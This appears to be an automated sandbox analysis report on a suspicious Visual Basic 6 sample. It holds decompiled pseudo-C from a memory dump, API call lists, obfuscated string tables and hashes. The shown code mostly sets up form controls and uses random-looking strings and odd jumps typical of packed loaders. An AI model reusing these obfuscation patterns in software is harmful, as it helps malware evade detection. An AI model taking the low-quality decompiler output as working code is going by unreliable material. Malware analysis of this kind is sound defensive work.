				_t153 =  *((intOrPtr*)( *_v132 + 0xa0))(_v132,  &_v124, _t149,  *((intOrPtr*)( *((intOrPtr*)( *_v156)) + 0x2fc))( *_v156));
				asm("fclex");
				_v136 = _t153;
				if(_v136 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40b290);
					_push(_v132);
					_push(_v136);
					L0040140C();
					_v160 = _t153;
				}
				_v80 = _v124;
				_v88 = 2;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v32);
				L00401364();
				L00401406();
				_v80 = _v80 | 0xffffffff;
				_v88 = 0xb;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v32);
				L00401364();
				_v80 = L"bXGxiMYDh8ceWaiz30";
				_v88 = 0x8008;
				_push(0);
				_push(L"Caption");
				_push(_v32);
				_t157 =  &_v56;
				_push(_t157);
				L0040136A();
				_t218 = _t217 + 0x10;
				_push(_t157);
				_t158 =  &_v88;
				_push(_t158);
				L0040135E();
				_v132 = _t158;
				L00401418();
				if(_v132 != 0) {
					if( *0x411010 != 0) {
						_v164 = 0x411010;
					} else {
						_push(0x411010);
						_push(0x40b81c);
						L00401412();
						_v164 = 0x411010;
					}
					_t194 =  *((intOrPtr*)( *_v164));
					_t170 =  &_v40;
					L00401400();
					_v132 = _t170;
					_t174 =  *((intOrPtr*)( *_v132 + 0x150))(_v132,  &_v128, _t170,  *((intOrPtr*)(_t194 + 0x2fc))( *_v164));
					asm("fclex");
					_v136 = _t174;
					if(_v136 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x150);
						_push(0x40b290);
						_push(_v132);
						_push(_v136);
						L0040140C();
						_v168 = _t174;
					}
					_push(_t194);
					_v124 =  *0x401260;
					_t231 =  *0x401258 *  *0x401250;
					if( *0x411000 != 0) {
						_push( *0x40124c);
						_push( *0x401248);
						L004012D4();
					} else {
						_t231 = _t231 /  *0x401248;
					}
					_v172 = _t231;
					_v136 = _v172;
					_v140 =  *0x401240;
					L00401358();
					 *_t218 =  *0x401234;
					_t236 =  *0x401230;
					_v152 = _t236;
					asm("fild dword [ebp-0x7c]");
					_v176 = _t236;
					_v156 = _v176;
					_t177 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t194, _t194, _t194, _t174, _t194, _t194);
					asm("fclex");
					_v140 = _t177;
					if(_v140 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x40aed8);
						_push(_a4);
						_push(_v140);
						L0040140C();
						_v180 = _t177;
					}
					L00401406();
				}
				if( *0x411010 != 0) {
					_v184 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v184 = 0x411010;
				}
				_t163 =  &_v40;
				L00401400();
				_v132 = _t163;
				_t166 =  *((intOrPtr*)( *_v132 + 0x1c4))(_v132, _t163,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x2fc))( *_v184));
				asm("fclex");
				_v136 = _t166;
				if(_v136 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x40b290);
					_push(_v132);
					_push(_v136);
					L0040140C();
					_v188 = _t166;
				}
				L00401406();
				asm("wait");
				_push(E0040FDC6);
				L00401406();
				return _t166;
			}

0x0040f8ba
0x0040f8c9
0x0040f8d5
0x0040f8dd
0x0040f8e0
0x0040f8e7
0x0040f8f6
0x0040f903
0x0040f90c
0x0040f90e
0x0040f918
0x0040f91d
0x0040f920
0x0040f927
0x0040f92e
0x0040f941
0x0040f947
0x0040f949
0x0040f950
0x0040f96f
0x0040f952
0x0040f952
0x0040f957
0x0040f95c
0x0040f95f
0x0040f962
0x0040f967
0x0040f967
0x0040f976
0x0040f979
0x0040f983
0x0040f984
0x0040f985
0x0040f986
0x0040f987
0x0040f98a
0x0040f994
0x0040f995
0x0040f996
0x0040f997
0x0040f998
0x0040f99a
0x0040f99f
0x0040f9a2
0x0040f9a5
0x0040f9a6
0x0040f9ae
0x0040f9af
0x0040f9b4
0x0040f9b8
0x0040f9b9
0x0040f9c1
0x0040f9c9
0x0040f9d1
0x0040f9d5
0x0040f9d6
0x0040f9d8
0x0040f9dd
0x0040f9e0
0x0040f9e7
0x0040f9ee
0x0040f9f1
0x0040f9fb
0x0040f9fc
0x0040f9fd
0x0040f9fe
0x0040f9ff
0x0040fa04
0x0040fa07
0x0040fa0c
0x0040fa13
0x0040fa1a
0x0040fa1d
0x0040fa27
0x0040fa28
0x0040fa29
0x0040fa2a
0x0040fa2b
0x0040fa30
0x0040fa33
0x0040fa3f
0x0040fa5c
0x0040fa41
0x0040fa41
0x0040fa46
0x0040fa4b
0x0040fa50
0x0040fa50
0x0040fa80
0x0040fa84
0x0040fa89
0x0040fa98
0x0040fa9e
0x0040faa0
0x0040faad
0x0040facf
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fab9
0x0040fabc
0x0040fac2
0x0040fac7
0x0040fac7
0x0040fada
0x0040fade
0x0040fae5
0x0040fae8
0x0040faf2
0x0040faf3
0x0040faf4
0x0040faf5
0x0040faf6
0x0040fafb
0x0040fafe
0x0040fb06
0x0040fb0b
0x0040fb0f
0x0040fb16
0x0040fb19
0x0040fb23
0x0040fb24
0x0040fb25
0x0040fb26
0x0040fb27
0x0040fb2c
0x0040fb2f
0x0040fb34
0x0040fb3b
0x0040fb42
0x0040fb44
0x0040fb49
0x0040fb4c
0x0040fb4f
0x0040fb50
0x0040fb55
0x0040fb58
0x0040fb59
0x0040fb5c
0x0040fb5d
0x0040fb62
0x0040fb69
0x0040fb74
0x0040fb81
0x0040fb9e
0x0040fb83
0x0040fb83
0x0040fb88
0x0040fb8d
0x0040fb92
0x0040fb92
0x0040fbb8
0x0040fbc2
0x0040fbc6
0x0040fbcb
0x0040fbda
0x0040fbe0
0x0040fbe2
0x0040fbef
0x0040fc11
0x0040fbf1
0x0040fbf1
0x0040fbf6
0x0040fbfb
0x0040fbfe
0x0040fc04
0x0040fc09
0x0040fc09
0x0040fc1e
0x0040fc1f
0x0040fc28
0x0040fc35
0x0040fc3f
0x0040fc45
0x0040fc4b
0x0040fc37
0x0040fc37
0x0040fc37
0x0040fc50
0x0040fc5d
0x0040fc67
0x0040fc70
0x0040fc7d
0x0040fc80
0x0040fc87
0x0040fc8a
0x0040fc8d
0x0040fc9a
0x0040fcaa
0x0040fcb0
0x0040fcb2
0x0040fcbf
0x0040fce1
0x0040fcc1
0x0040fcc1
0x0040fcc6
0x0040fccb
0x0040fcce
0x0040fcd4
0x0040fcd9
0x0040fcd9
0x0040fceb
0x0040fceb
0x0040fcf7
0x0040fd14
0x0040fcf9
0x0040fcf9
0x0040fcfe
0x0040fd03
0x0040fd08
0x0040fd08
0x0040fd38
0x0040fd3c
0x0040fd41
0x0040fd4c
0x0040fd52
0x0040fd54
0x0040fd61
0x0040fd83
0x0040fd63
0x0040fd63
0x0040fd68
0x0040fd6d
0x0040fd70
0x0040fd76
0x0040fd7b
0x0040fd7b
0x0040fd8d
0x0040fd92
0x0040fd93
0x0040fdc0
0x0040fdc5

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040F8D5
__vbaStrCat.MSVBVM60(0040B3E0,VB.Comm,?,?,?,?,004012B6), ref: 0040F903
__vbaStrMove.MSVBVM60(0040B3E0,VB.Comm,?,?,?,?,004012B6), ref: 0040F90D
__vbaStrCat.MSVBVM60(ndButton,00000000,0040B3E0,VB.Comm,?,?,?,?,004012B6), ref: 0040F918
__vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040AED8,00000218), ref: 0040F962
__vbaChkstk.MSVBVM60(00000000,00401268,0040AED8,00000218), ref: 0040F979
__vbaChkstk.MSVBVM60(00000000,00401268,0040AED8,00000218), ref: 0040F98A
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 0040F9A6
__vbaObjVar.MSVBVM60(00000000), ref: 0040F9AF
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0040F9B9
__vbaFreeStr.MSVBVM60(?,00000000,00000000), ref: 0040F9C1
__vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 0040F9C9
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000000,?,00000000,00000000), ref: 0040F9D8
__vbaChkstk.MSVBVM60 ref: 0040F9F1
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 0040FA07
__vbaChkstk.MSVBVM60(?,Caption), ref: 0040FA1D
__vbaLateMemSt.MSVBVM60(?,Left,?,Caption), ref: 0040FA33
__vbaNew2.MSVBVM60(0040B81C,00411010,?,Left,?,Caption), ref: 0040FA4B
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FA84
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000000A0), ref: 0040FAC2
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Left,?), ref: 0040FAE8
__vbaLateMemSt.MSVBVM60(?,Top,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FAFE
__vbaFreeObj.MSVBVM60(?,Top,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FB06
__vbaChkstk.MSVBVM60(?,Top,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FB19
__vbaLateMemSt.MSVBVM60(?,Visible,?,Top), ref: 0040FB2F
__vbaLateMemCallLd.MSVBVM60(00000008,?,Caption,00000000,?,Visible,?,Top), ref: 0040FB50
__vbaVarTstEq.MSVBVM60(00008008,00000000), ref: 0040FB5D
__vbaFreeVar.MSVBVM60(00008008,00000000), ref: 0040FB69
__vbaNew2.MSVBVM60(0040B81C,00411010,00008008,00000000), ref: 0040FB8D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FBC6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000150), ref: 0040FC04
_adj_fdiv_m64.MSVBVM60 ref: 0040FC4B
__vbaFpI4.MSVBVM60(?,?,?,00000000,?,0040B290,00000150), ref: 0040FC70
__vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040AED8,000002C0,?,?,?,00000000), ref: 0040FCD4
__vbaFreeObj.MSVBVM60(?,?,?,00000000), ref: 0040FCEB
__vbaNew2.MSVBVM60(0040B81C,00411010,00008008,00000000), ref: 0040FD03
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FD3C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001C4), ref: 0040FD76
__vbaFreeObj.MSVBVM60(00000000,?,0040B290,000001C4), ref: 0040FD8D
__vbaFreeObj.MSVBVM60(0040FDC6), ref: 0040FDC0

Strings

Add, xrefs: 0040F99A
kHU154, xrefs: 0040F9E0
ndButton, xrefs: 0040F913
Top, xrefs: 0040FAF6
8j, xrefs: 0040FA0C
Visible, xrefs: 0040FB27
ZQ0LmXeBBdOak3nkpdU2Ht1cVVA3XgwEeu106, xrefs: 0040F927
bXGxiMYDh8ceWaiz30, xrefs: 0040FB34
VB.Comm, xrefs: 0040F8F9
Left, xrefs: 0040FA2B
Caption, xrefs: 0040F9FF, 0040FB44

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$Chkstk$Late$CheckHresult$New2$Call$AddrefListMove_adj_fdiv_m64
String ID: 8j$Add$Caption$Left$Top$VB.Comm$Visible$ZQ0LmXeBBdOak3nkpdU2Ht1cVVA3XgwEeu106$bXGxiMYDh8ceWaiz30$kHU154$ndButton
API String ID: 3246759356-3275502106
Opcode ID: 4ed87a218cf4d9c258438c210f07829a07e541edccf3dfdcf52e8409128c8221
Instruction ID: baeeeb8c4a76fa4b9255f69f2cdda897466609dec6a79a0b50a1a8bd1e66fe4e
Opcode Fuzzy Hash: 4ed87a218cf4d9c258438c210f07829a07e541edccf3dfdcf52e8409128c8221
Instruction Fuzzy Hash: E2D13831900218AFDB11EFA1CC45BDDBBB5BF08308F1084BAF545BB2A1CB795A859F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F90B, Relevance: 86.1, APIs: 38, Strings: 11, Instructions: 316
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040F90B(intOrPtr __eax) {
				signed int _t126;
				void* _t129;
				signed int _t138;
				signed int _t142;
				void* _t146;
				signed int _t147;
				signed int _t152;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				signed int _t166;
				intOrPtr _t181;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t199;
				intOrPtr* _t200;
				signed long long _t213;
				intOrPtr _t218;

				_t196 = _t195 - 1;
				asm("loopne 0xffffffea");
				0x5140f82d();
				L004013BE();
				 *((intOrPtr*)(_t196 - 0x2c)) = __eax;
				 *((intOrPtr*)(_t196 - 0x34)) = 8;
				 *(_t196 - 0x5c) = L"ZQ0LmXeBBdOak3nkpdU2Ht1cVVA3XgwEeu106";
				 *((intOrPtr*)(_t196 - 0x64)) = 8;
				_t126 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)))) + 0x218))( *((intOrPtr*)(_t196 + 8)), _t196 - 0x24, L"ndButton");
				asm("fclex");
				 *(_t196 - 0x80) = _t126;
				if( *(_t196 - 0x80) >= 0) {
					 *(_t196 - 0x94) =  *(_t196 - 0x94) & 0x00000000;
				} else {
					_push(0x218);
					_push(0x40aed8);
					_push( *((intOrPtr*)(_t196 + 8)));
					_push( *(_t196 - 0x80));
					L0040140C();
					 *(_t196 - 0x94) = _t126;
				}
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push( *(_t196 - 0x24));
				_t129 = _t196 - 0x44;
				_push(_t129); // executed
				L0040136A(); // executed
				_push(_t129);
				L0040137C();
				_push(_t129);
				_push(_t196 - 0x1c);
				L00401382();
				L004013DC();
				L00401406();
				_push(_t196 - 0x44);
				_push(_t196 - 0x34);
				_push(2);
				L00401424();
				_t199 = _t197 + 0x3c;
				 *(_t196 - 0x4c) = L"kHU154";
				 *(_t196 - 0x54) = 8;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Caption");
				_push( *((intOrPtr*)(_t196 - 0x1c)));
				L00401364();
				 *(_t196 - 0x4c) = 0x6a38;
				 *(_t196 - 0x54) = 2;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push( *((intOrPtr*)(_t196 - 0x1c)));
				L00401364();
				if( *0x411010 != 0) {
					 *((intOrPtr*)(_t196 - 0x98)) = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					 *((intOrPtr*)(_t196 - 0x98)) = 0x411010;
				}
				_t138 = _t196 - 0x24;
				L00401400();
				 *(_t196 - 0x80) = _t138;
				_t142 =  *((intOrPtr*)( *( *(_t196 - 0x80)) + 0xa0))( *(_t196 - 0x80), _t196 - 0x78, _t138,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 - 0x98)))))) + 0x2fc))( *((intOrPtr*)( *((intOrPtr*)(_t196 - 0x98))))));
				asm("fclex");
				 *(_t196 - 0x84) = _t142;
				if( *(_t196 - 0x84) >= 0) {
					 *(_t196 - 0x9c) =  *(_t196 - 0x9c) & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40b290);
					_push( *(_t196 - 0x80));
					_push( *(_t196 - 0x84));
					L0040140C();
					 *(_t196 - 0x9c) = _t142;
				}
				 *(_t196 - 0x4c) =  *((intOrPtr*)(_t196 - 0x78));
				 *(_t196 - 0x54) = 2;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push( *((intOrPtr*)(_t196 - 0x1c)));
				L00401364();
				L00401406();
				 *(_t196 - 0x4c) =  *(_t196 - 0x4c) | 0xffffffff;
				 *(_t196 - 0x54) = 0xb;
				_push(0x10);
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push( *((intOrPtr*)(_t196 - 0x1c)));
				L00401364();
				 *(_t196 - 0x4c) = L"bXGxiMYDh8ceWaiz30";
				 *(_t196 - 0x54) = 0x8008;
				_push(0);
				_push(L"Caption");
				_push( *((intOrPtr*)(_t196 - 0x1c)));
				_t146 = _t196 - 0x34;
				_push(_t146);
				L0040136A();
				_t200 = _t199 + 0x10;
				_push(_t146);
				_t147 = _t196 - 0x54;
				_push(_t147);
				L0040135E();
				 *(_t196 - 0x80) = _t147;
				L00401418();
				if( *(_t196 - 0x80) != 0) {
					if( *0x411010 != 0) {
						 *((intOrPtr*)(_t196 - 0xa0)) = 0x411010;
					} else {
						_push(0x411010);
						_push(0x40b81c);
						L00401412();
						 *((intOrPtr*)(_t196 - 0xa0)) = 0x411010;
					}
					_t181 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 - 0xa0))))));
					_t159 = _t196 - 0x24;
					L00401400();
					 *(_t196 - 0x80) = _t159;
					_t163 =  *((intOrPtr*)( *( *(_t196 - 0x80)) + 0x150))( *(_t196 - 0x80), _t196 - 0x7c, _t159,  *((intOrPtr*)(_t181 + 0x2fc))( *((intOrPtr*)( *((intOrPtr*)(_t196 - 0xa0))))));
					asm("fclex");
					 *(_t196 - 0x84) = _t163;
					if( *(_t196 - 0x84) >= 0) {
						 *(_t196 - 0xa4) =  *(_t196 - 0xa4) & 0x00000000;
					} else {
						_push(0x150);
						_push(0x40b290);
						_push( *(_t196 - 0x80));
						_push( *(_t196 - 0x84));
						L0040140C();
						 *(_t196 - 0xa4) = _t163;
					}
					_push(_t181);
					 *_t200 =  *0x401260;
					_t213 =  *0x401258 *  *0x401250;
					if( *0x411000 != 0) {
						_push( *0x40124c);
						_push( *0x401248);
						L004012D4();
					} else {
						_t213 = _t213 /  *0x401248;
					}
					 *((intOrPtr*)(_t196 - 0xa8)) = _t213;
					 *_t200 =  *((intOrPtr*)(_t196 - 0xa8));
					 *_t200 =  *0x401240;
					L00401358();
					 *_t200 =  *0x401234;
					_t218 =  *0x401230;
					 *_t200 = _t218;
					asm("fild dword [ebp-0x7c]");
					 *((intOrPtr*)(_t196 - 0xac)) = _t218;
					 *_t200 =  *((intOrPtr*)(_t196 - 0xac));
					_t166 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)))) + 0x2c0))( *((intOrPtr*)(_t196 + 8)), 0x1c2, _t181, _t181, _t181, _t163, _t181, _t181);
					asm("fclex");
					 *(_t196 - 0x88) = _t166;
					if( *(_t196 - 0x88) >= 0) {
						 *(_t196 - 0xb0) =  *(_t196 - 0xb0) & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x40aed8);
						_push( *((intOrPtr*)(_t196 + 8)));
						_push( *(_t196 - 0x88));
						L0040140C();
						 *(_t196 - 0xb0) = _t166;
					}
					L00401406();
				}
				if( *0x411010 != 0) {
					 *((intOrPtr*)(_t196 - 0xb4)) = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					 *((intOrPtr*)(_t196 - 0xb4)) = 0x411010;
				}
				_t152 = _t196 - 0x24;
				L00401400();
				 *(_t196 - 0x80) = _t152;
				_t155 =  *((intOrPtr*)( *( *(_t196 - 0x80)) + 0x1c4))( *(_t196 - 0x80), _t152,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t196 - 0xb4)))))) + 0x2fc))( *((intOrPtr*)( *((intOrPtr*)(_t196 - 0xb4))))));
				asm("fclex");
				 *(_t196 - 0x84) = _t155;
				if( *(_t196 - 0x84) >= 0) {
					 *(_t196 - 0xb8) =  *(_t196 - 0xb8) & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x40b290);
					_push( *(_t196 - 0x80));
					_push( *(_t196 - 0x84));
					L0040140C();
					 *(_t196 - 0xb8) = _t155;
				}
				L00401406();
				asm("wait");
				_push(E0040FDC6);
				L00401406();
				return _t155;
			}

0x0040f90b
0x0040f90c
0x0040f90e
0x0040f918
0x0040f91d
0x0040f920
0x0040f927
0x0040f92e
0x0040f941
0x0040f947
0x0040f949
0x0040f950
0x0040f96f
0x0040f952
0x0040f952
0x0040f957
0x0040f95c
0x0040f95f
0x0040f962
0x0040f967
0x0040f967
0x0040f976
0x0040f979
0x0040f983
0x0040f984
0x0040f985
0x0040f986
0x0040f987
0x0040f98a
0x0040f994
0x0040f995
0x0040f996
0x0040f997
0x0040f998
0x0040f99a
0x0040f99f
0x0040f9a2
0x0040f9a5
0x0040f9a6
0x0040f9ae
0x0040f9af
0x0040f9b4
0x0040f9b8
0x0040f9b9
0x0040f9c1
0x0040f9c9
0x0040f9d1
0x0040f9d5
0x0040f9d6
0x0040f9d8
0x0040f9dd
0x0040f9e0
0x0040f9e7
0x0040f9ee
0x0040f9f1
0x0040f9fb
0x0040f9fc
0x0040f9fd
0x0040f9fe
0x0040f9ff
0x0040fa04
0x0040fa07
0x0040fa0c
0x0040fa13
0x0040fa1a
0x0040fa1d
0x0040fa27
0x0040fa28
0x0040fa29
0x0040fa2a
0x0040fa2b
0x0040fa30
0x0040fa33
0x0040fa3f
0x0040fa5c
0x0040fa41
0x0040fa41
0x0040fa46
0x0040fa4b
0x0040fa50
0x0040fa50
0x0040fa80
0x0040fa84
0x0040fa89
0x0040fa98
0x0040fa9e
0x0040faa0
0x0040faad
0x0040facf
0x0040faaf
0x0040faaf
0x0040fab4
0x0040fab9
0x0040fabc
0x0040fac2
0x0040fac7
0x0040fac7
0x0040fada
0x0040fade
0x0040fae5
0x0040fae8
0x0040faf2
0x0040faf3
0x0040faf4
0x0040faf5
0x0040faf6
0x0040fafb
0x0040fafe
0x0040fb06
0x0040fb0b
0x0040fb0f
0x0040fb16
0x0040fb19
0x0040fb23
0x0040fb24
0x0040fb25
0x0040fb26
0x0040fb27
0x0040fb2c
0x0040fb2f
0x0040fb34
0x0040fb3b
0x0040fb42
0x0040fb44
0x0040fb49
0x0040fb4c
0x0040fb4f
0x0040fb50
0x0040fb55
0x0040fb58
0x0040fb59
0x0040fb5c
0x0040fb5d
0x0040fb62
0x0040fb69
0x0040fb74
0x0040fb81
0x0040fb9e
0x0040fb83
0x0040fb83
0x0040fb88
0x0040fb8d
0x0040fb92
0x0040fb92
0x0040fbb8
0x0040fbc2
0x0040fbc6
0x0040fbcb
0x0040fbda
0x0040fbe0
0x0040fbe2
0x0040fbef
0x0040fc11
0x0040fbf1
0x0040fbf1
0x0040fbf6
0x0040fbfb
0x0040fbfe
0x0040fc04
0x0040fc09
0x0040fc09
0x0040fc1e
0x0040fc1f
0x0040fc28
0x0040fc35
0x0040fc3f
0x0040fc45
0x0040fc4b
0x0040fc37
0x0040fc37
0x0040fc37
0x0040fc50
0x0040fc5d
0x0040fc67
0x0040fc70
0x0040fc7d
0x0040fc80
0x0040fc87
0x0040fc8a
0x0040fc8d
0x0040fc9a
0x0040fcaa
0x0040fcb0
0x0040fcb2
0x0040fcbf
0x0040fce1
0x0040fcc1
0x0040fcc1
0x0040fcc6
0x0040fccb
0x0040fcce
0x0040fcd4
0x0040fcd9
0x0040fcd9
0x0040fceb
0x0040fceb
0x0040fcf7
0x0040fd14
0x0040fcf9
0x0040fcf9
0x0040fcfe
0x0040fd03
0x0040fd08
0x0040fd08
0x0040fd38
0x0040fd3c
0x0040fd41
0x0040fd4c
0x0040fd52
0x0040fd54
0x0040fd61
0x0040fd83
0x0040fd63
0x0040fd63
0x0040fd68
0x0040fd6d
0x0040fd70
0x0040fd76
0x0040fd7b
0x0040fd7b
0x0040fd8d
0x0040fd92
0x0040fd93
0x0040fdc0
0x0040fdc5

APIs

__vbaStrCat.MSVBVM60(0040B3E0,VB.Comm,?,?,?,?,004012B6), ref: 0040F903
__vbaStrMove.MSVBVM60(0040B3E0,VB.Comm,?,?,?,?,004012B6), ref: 0040F90D
__vbaStrCat.MSVBVM60(ndButton,00000000,0040B3E0,VB.Comm,?,?,?,?,004012B6), ref: 0040F918
__vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040AED8,00000218), ref: 0040F962
__vbaChkstk.MSVBVM60(00000000,00401268,0040AED8,00000218), ref: 0040F979
__vbaChkstk.MSVBVM60(00000000,00401268,0040AED8,00000218), ref: 0040F98A
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 0040F9A6
__vbaObjVar.MSVBVM60(00000000), ref: 0040F9AF
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0040F9B9
__vbaFreeStr.MSVBVM60(?,00000000,00000000), ref: 0040F9C1
__vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 0040F9C9
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000000,?,00000000,00000000), ref: 0040F9D8
__vbaChkstk.MSVBVM60 ref: 0040F9F1
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 0040FA07
__vbaChkstk.MSVBVM60(?,Caption), ref: 0040FA1D

Strings

Add, xrefs: 0040F99A
kHU154, xrefs: 0040F9E0
ndButton, xrefs: 0040F913
Top, xrefs: 0040FAF6
8j, xrefs: 0040FA0C
Visible, xrefs: 0040FB27
ZQ0LmXeBBdOak3nkpdU2Ht1cVVA3XgwEeu106, xrefs: 0040F927
bXGxiMYDh8ceWaiz30, xrefs: 0040FB34
VB.Comm, xrefs: 0040F8F9
Left, xrefs: 0040FA2B
Caption, xrefs: 0040F9FF, 0040FB44

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Chkstk$Free$Late$AddrefCallCheckHresultListMove
String ID: 8j$Add$Caption$Left$Top$VB.Comm$Visible$ZQ0LmXeBBdOak3nkpdU2Ht1cVVA3XgwEeu106$bXGxiMYDh8ceWaiz30$kHU154$ndButton
API String ID: 46584698-3275502106
Opcode ID: 0a6cdd8d346dd8ee14697f0776bcc51639bb97c0a9b788c73d6d375a21424ed2
Instruction ID: 7ee6fd37df42502295a4ad8dc8be6db6ac6378f9719eca849d9e1cd10b2ea6fc
Opcode Fuzzy Hash: 0a6cdd8d346dd8ee14697f0776bcc51639bb97c0a9b788c73d6d375a21424ed2
Instruction Fuzzy Hash: CDC13831900218AFDB11EFA1C846BDD7BB5BF08308F1044BAF545BB2E2CB795A499B59

Uniqueness

Uniqueness Score: -1.00%

Function 00410546, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 223
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00410546(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				intOrPtr _v120;
				char _v128;
				intOrPtr _v152;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _t98;
				short _t107;
				signed int _t111;
				char* _t115;
				char* _t116;
				char* _t122;
				signed int _t126;
				signed int _t136;
				void* _t156;
				void* _t158;
				intOrPtr _t159;

				_t159 = _t158 - 0xc;
				 *[fs:0x0] = _t159;
				L004012B0();
				_v16 = _t159;
				_v12 = 0x401298;
				_v8 = 0;
				_t98 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012b6, _t156);
				_push(1);
				L00401340();
				L004013FA();
				_push(_t98);
				_push(0x40b5f8);
				L0040134C();
				asm("sbb eax, eax");
				_v164 =  ~( ~( ~_t98));
				L004013DC();
				if(_v164 != 0) {
					if( *0x411010 != 0) {
						_v192 = 0x411010;
					} else {
						_push(0x411010);
						_push(0x40b81c);
						L00401412();
						_v192 = 0x411010;
					}
					_t122 =  &_v48;
					L00401400();
					_v164 = _t122;
					_t126 =  *((intOrPtr*)( *_v164 + 0x108))(_v164,  &_v44, _t122,  *((intOrPtr*)( *((intOrPtr*)( *_v192)) + 0x2fc))( *_v192));
					asm("fclex");
					_v168 = _t126;
					if(_v168 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x40b290);
						_push(_v164);
						_push(_v168);
						L0040140C();
						_v196 = _t126;
					}
					if( *0x4112d4 != 0) {
						_v200 = 0x4112d4;
					} else {
						_push(0x4112d4);
						_push(0x40b244);
						L00401412();
						_v200 = 0x4112d4;
					}
					_v172 =  *_v200;
